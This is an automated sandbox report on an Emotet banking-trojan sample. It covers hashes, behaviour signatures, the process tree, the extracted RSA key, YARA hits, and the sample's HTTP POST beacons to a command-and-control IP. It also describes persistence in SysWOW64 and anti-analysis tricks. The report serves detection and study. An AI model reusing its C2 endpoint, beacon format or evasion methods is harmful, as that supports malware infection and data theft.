Analysis Report 2pf7VAYK.exe

Overview

General Information

Sample Name:2pf7VAYK.exe
Analysis ID:289509
MD5:cffef374aa5d46b7c2fc602dcecfda06
SHA1:8b70ce1afdfca311f23f7b3c0c604ab5fd1b13a2
SHA256:bd7b495b244b5fb2b38f11fb9699b6a993f06afeadfb24084fc889bde687fc43

Detection

Emotet
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • 2pf7VAYK.exe (PID: 6968 cmdline: 'C:\Users\user\Desktop\2pf7VAYK.exe' MD5: CFFEF374AA5D46B7C2FC602DCECFDA06)
    • EmailApis.exe (PID: 7008 cmdline: C:\Windows\SysWOW64\vcamp120\EmailApis.exe MD5: CFFEF374AA5D46B7C2FC602DCECFDA06)
  • svchost.exe (PID: 6412 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6568 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4772 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1000 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4048 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6356 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 7000 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 7132 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.441742476.0000000002181000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000000.00000002.178857289.0000000000701000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000000.00000002.178799595.00000000006B0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000001.00000002.441723707.0000000002164000.00000004.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000000.00000002.178837009.00000000006E4000.00000004.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.2pf7VAYK.exe.700000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
1.2.EmailApis.exe.2180000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: 2pf7VAYK.exe | Virustotal: Detection: 9%
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02182210 CryptExportKey,CryptEncrypt,CryptDestroyHash,GetProcessHeap,RtlAllocateHeap,CryptGetHashParam,memcpy,CryptDuplicateHash | 1_2_02182210
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_021825C0 CryptCreateHash,CryptGenKey,CryptAcquireContextW,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptImportKey,LocalFree | 1_2_021825C0
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02181FA0 CryptDuplicateHash,memcpy,CryptVerifySignatureW,CryptDestroyHash,CryptDecrypt | 1_2_02181FA0
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02183810 FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,FindClose,FindClose | 1_2_02183810
Source: Joe Sandbox View | IP Address: 174.106.122.139 174.106.122.139
Source: global traffic | HTTP traffic detected:
  POST /e20DyMydyg/ HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: keep-alive
  Referer: 174.106.122.139/e20DyMydyg/
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data; boundary=--------------QlvyMyFgRxyLaT
  Host: 174.106.122.139
  Content-Length: 4596
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /e20DyMydyg/ HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: keep-alive
  Referer: 174.106.122.139/e20DyMydyg/
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data; boundary=--------------QlvyMyFgRxyLaT
  Host: 174.106.122.139
  Content-Length: 4596
  Cache-Control: no-cache
  Data Raw: (multipart body hex dump omitted)
Source: unknown | TCP traffic detected without corresponding DNS query: 174.106.122.139
Source: unknown | TCP traffic detected without corresponding DNS query: 174.106.122.139
Source: unknown | TCP traffic detected without corresponding DNS query: 174.106.122.139
Source: unknown | TCP traffic detected without corresponding DNS query: 174.106.122.139
Source: unknown | TCP traffic detected without corresponding DNS query: 174.106.122.139
Source: unknown | TCP traffic detected without corresponding DNS query: 174.106.122.139
Source: unknown | TCP traffic detected without corresponding DNS query: 174.106.122.139
Source: unknown | TCP traffic detected without corresponding DNS query: 174.106.122.139
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02182920 InternetReadFile,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,HttpQueryInfoW | 1_2_02182920
Source: unknown | HTTP traffic detected:
  POST /e20DyMydyg/ HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: keep-alive
  Referer: 174.106.122.139/e20DyMydyg/
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data; boundary=--------------QlvyMyFgRxyLaT
  Host: 174.106.122.139
  Content-Length: 4596
  Cache-Control: no-cache
Source: EmailApis.exe, 00000001.00000002.442315916.000000000288E000.00000004.00000001.sdmp | String found in binary or memory: http://174.106.122.139/e20DyMydyg/
Source: EmailApis.exe, 00000001.00000002.442315916.000000000288E000.00000004.00000001.sdmp | String found in binary or memory: http://174.106.122.139/e20DyMydyg/x
Source: svchost.exe, 00000006.00000002.442499036.000001CF19413000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: svchost.exe, 00000006.00000002.442499036.000001CF19413000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000006.00000002.442499036.000001CF19413000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: svchost.exe, 00000006.00000002.442381117.000001CF19370000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: svchost.exe, 00000006.00000002.441398124.000001CF13C99000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumera
Source: svchost.exe, 00000006.00000002.441398124.000001CF13C99000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumeration
Source: svchost.exe, 0000000A.00000002.303911258.0000020407213000.00000004.00000001.sdmp | String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 0000000A.00000003.302979350.0000020407260000.00000004.00000001.sdmp | String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 0000000A.00000003.303081749.0000020407249000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000A.00000003.302979350.0000020407260000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000A.00000002.303967263.000002040723D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000A.00000003.302979350.0000020407260000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000A.00000002.303990056.000002040724B000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000A.00000002.303967263.000002040723D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000A.00000003.302979350.0000020407260000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000A.00000003.302979350.0000020407260000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000A.00000003.302979350.0000020407260000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000A.00000003.303222664.0000020407240000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000A.00000003.303222664.0000020407240000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000A.00000003.302979350.0000020407260000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000A.00000002.304015877.000002040725C000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000A.00000003.303081749.0000020407249000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000A.00000002.304015877.000002040725C000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000A.00000002.304015877.000002040725C000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000A.00000002.303990056.000002040724B000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.303081749.0000020407249000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000A.00000003.302979350.0000020407260000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000A.00000002.303967263.000002040723D000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000A.00000003.281277897.0000020407231000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000A.00000002.303967263.000002040723D000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000A.00000002.303967263.000002040723D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.303911258.0000020407213000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000A.00000003.303222664.0000020407240000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000A.00000003.303222664.0000020407240000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000A.00000003.281277897.0000020407231000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000A.00000003.281277897.0000020407231000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000A.00000002.303990056.000002040724B000.00000004.00000001.sdmp | String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: svchost.exe, 00000006.00000002.442499036.000001CF19413000.00000004.00000001.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
Source: 2pf7VAYK.exe, 00000000.00000002.178899656.000000000079A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Emotet
Source: Yara match | File source: 00000001.00000002.441742476.0000000002181000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.178857289.0000000000701000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.178799595.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.441723707.0000000002164000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.178837009.00000000006E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.441653243.0000000002050000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.2pf7VAYK.exe.700000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.EmailApis.exe.2180000.1.unpack, type: UNPACKEDPE
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_021825C0 CryptCreateHash,CryptGenKey,CryptAcquireContextW,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptImportKey,LocalFree | 1_2_021825C0
Source: C:\Users\user\Desktop\2pf7VAYK.exe | File created: C:\Windows\SysWOW64\vcamp120\
Source: C:\Users\user\Desktop\2pf7VAYK.exe | File deleted: C:\Windows\SysWOW64\vcamp120\EmailApis.exe:Zone.Identifier
Source: C:\Users\user\Desktop\2pf7VAYK.exe | Code function: 0_2_004034C1 | 0_2_004034C1
Source: C:\Users\user\Desktop\2pf7VAYK.exe | Code function: 0_2_00403AE8 | 0_2_00403AE8
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_004034C1 | 1_2_004034C1
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_00403AE8 | 1_2_00403AE8
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_021882B0 | 1_2_021882B0
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02181C60 | 1_2_02181C60
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02183CB0 | 1_2_02183CB0
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02183EE0 | 1_2_02183EE0
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02187700 | 1_2_02187700
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02183F07 | 1_2_02183F07
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02187F30 | 1_2_02187F30
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02183B20 | 1_2_02183B20
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_021865B0 | 1_2_021865B0
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02059E4E | 1_2_02059E4E
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_0205584E | 1_2_0205584E
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_0205E64B | 1_2_0205E64B
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_0205E662 | 1_2_0205E662
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02055A7E | 1_2_02055A7E
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_0205929E | 1_2_0205929E
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02055AA5 | 1_2_02055AA5
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_020556BE | 1_2_020556BE
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02059ACE | 1_2_02059ACE
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_0205814E | 1_2_0205814E
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_0205E15B | 1_2_0205E15B
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_0205E3BA | 1_2_0205E3BA
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_020537FE | 1_2_020537FE
Source: 2pf7VAYK.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2pf7VAYK.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2pf7VAYK.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2pf7VAYK.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2pf7VAYK.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2pf7VAYK.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2pf7VAYK.exe, 00000000.00000002.180120246.00000000029F0000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs 2pf7VAYK.exe
Source: 2pf7VAYK.exe, 00000000.00000002.180120246.00000000029F0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 2pf7VAYK.exe
Source: 2pf7VAYK.exe, 00000000.00000002.179904020.00000000028F0000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs 2pf7VAYK.exe
Source: classification engine | Classification label: mal68.troj.evad.winEXE@13/5@0/2
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02184CB0 Process32NextW,Process32NextW,Process32FirstW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CloseHandle,FindCloseChangeNotification | 1_2_02184CB0
Source: C:\Users\user\Desktop\2pf7VAYK.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7140:120:WilError_01
Source: 2pf7VAYK.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\2pf7VAYK.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\2pf7VAYK.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: 2pf7VAYK.exe | Virustotal: Detection: 9%
Source: unknown | Process created: C:\Users\user\Desktop\2pf7VAYK.exe 'C:\Users\user\Desktop\2pf7VAYK.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\vcamp120\EmailApis.exe C:\Windows\SysWOW64\vcamp120\EmailApis.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\2pf7VAYK.exe | Process created: C:\Windows\SysWOW64\vcamp120\EmailApis.exe C:\Windows\SysWOW64\vcamp120\EmailApis.exe
Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Users\user\Desktop\2pf7VAYK.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: 2pf7VAYK.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: c:\Users\Dodo\Pictures\111\drawwindow_src\Release\DrawWindow.pdbPA | source: 2pf7VAYK.exe
Source: Binary string: awWindow.pdb | source: EmailApis.exe
Source: Binary string: ctures\111\drawwindow_src\Release\DrawWindow.pdb | source: EmailApis.exe
Source: Binary string: c:\Users\Dodo\Pictures\111\drawwindow_src\Release\DrawWindow.pdb | source: 2pf7VAYK.exe
Source: Binary string: sers\Dodo\Pictures\111\drawwindow_src\Release\DrawWindow.pdb | source: EmailApis.exe
Source: C:\Users\user\Desktop\2pf7VAYK.exe | Code function: 0_2_0040BD50 LoadLibraryW,GetProcAddress | 0_2_0040BD50
Source: C:\Users\user\Desktop\2pf7VAYK.exe | Code function: 0_2_00403AD7 push ecx; ret | 0_2_00403AE7
Source: C:\Users\user\Desktop\2pf7VAYK.exe | Code function: 0_2_00404CA0 push eax; ret | 0_2_00404CB4
Source: C:\Users\user\Desktop\2pf7VAYK.exe | Code function: 0_2_00404CA0 push eax; ret | 0_2_00404CDC
Source: C:\Users\user\Desktop\2pf7VAYK.exe | Code function: 0_2_00402BF8 push eax; ret | 0_2_00402C16
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_00403AD7 push ecx; ret | 1_2_00403AE7
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_00404CA0 push eax; ret | 1_2_00404CB4
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_00404CA0 push eax; ret | 1_2_00404CDC
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_00402BF8 push eax; ret | 1_2_00402C16
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02185E10 push ecx; mov dword ptr [esp], 00006163h | 1_2_02185E11
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02186030 push ecx; mov dword ptr [esp], 00002DB0h | 1_2_02186031
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02185E60 push ecx; mov dword ptr [esp], 0000FB39h | 1_2_02185E61
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02186080 push ecx; mov dword ptr [esp], 000093C3h | 1_2_02186081
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02185EA0 push ecx; mov dword ptr [esp], 0000B3C5h | 1_2_02185EA1
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02185EC0 push ecx; mov dword ptr [esp], 0000C070h | 1_2_02185EC1
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02185F20 push ecx; mov dword ptr [esp], 00003106h | 1_2_02185F21
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02185F40 push ecx; mov dword ptr [esp], 0000A80Dh | 1_2_02185F41
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02185F80 push ecx; mov dword ptr [esp], 0000FC88h | 1_2_02185F81
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02185DC0 push ecx; mov dword ptr [esp], 00009C10h | 1_2_02185DC1
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02185FE0 push ecx; mov dword ptr [esp], 0000CC57h | 1_2_02185FE1
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02057C1E push ecx; mov dword ptr [esp], 000093C3h | 1_2_02057C1F
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02058C1E push edi; ret | 1_2_02058C24
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02057A3E push ecx; mov dword ptr [esp], 0000B3C5h | 1_2_02057A3F
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02057A5E push ecx; mov dword ptr [esp], 0000C070h | 1_2_02057A5F
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02057ABE push ecx; mov dword ptr [esp], 00003106h | 1_2_02057ABF
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02057ADE push ecx; mov dword ptr [esp], 0000A80Dh | 1_2_02057ADF
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_0205DAF5 push ss; ret | 1_2_0205DB22
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_0205D71C push FFFFFFB9h; iretd | 1_2_0205D731
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02057B1E push ecx; mov dword ptr [esp], 0000FC88h | 1_2_02057B1F
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_0205795E push ecx; mov dword ptr [esp], 00009C10h | 1_2_0205795F
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02057B7E push ecx; mov dword ptr [esp], 0000CC57h | 1_2_02057B7F
Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_020579AE push ecx; mov dword ptr [esp], 00006163h | 1_2_020579AF

                Persistence and Installation Behavior:

                Drops executables to the windows directory (C:\Windows) and starts them
                Source: C:\Users\user\Desktop\2pf7VAYK.exe | Executable created and started: C:\Windows\SysWOW64\vcamp120\EmailApis.exe
                Source: C:\Users\user\Desktop\2pf7VAYK.exe | PE file moved: C:\Windows\SysWOW64\vcamp120\EmailApis.exe

                Hooking and other Techniques for Hiding and Protection:

                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Users\user\Desktop\2pf7VAYK.exe | File opened: C:\Windows\SysWOW64\vcamp120\EmailApis.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\Desktop\2pf7VAYK.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Windows\System32\svchost.exe TID: 6604 | Thread sleep time: -30000s >= -30000s
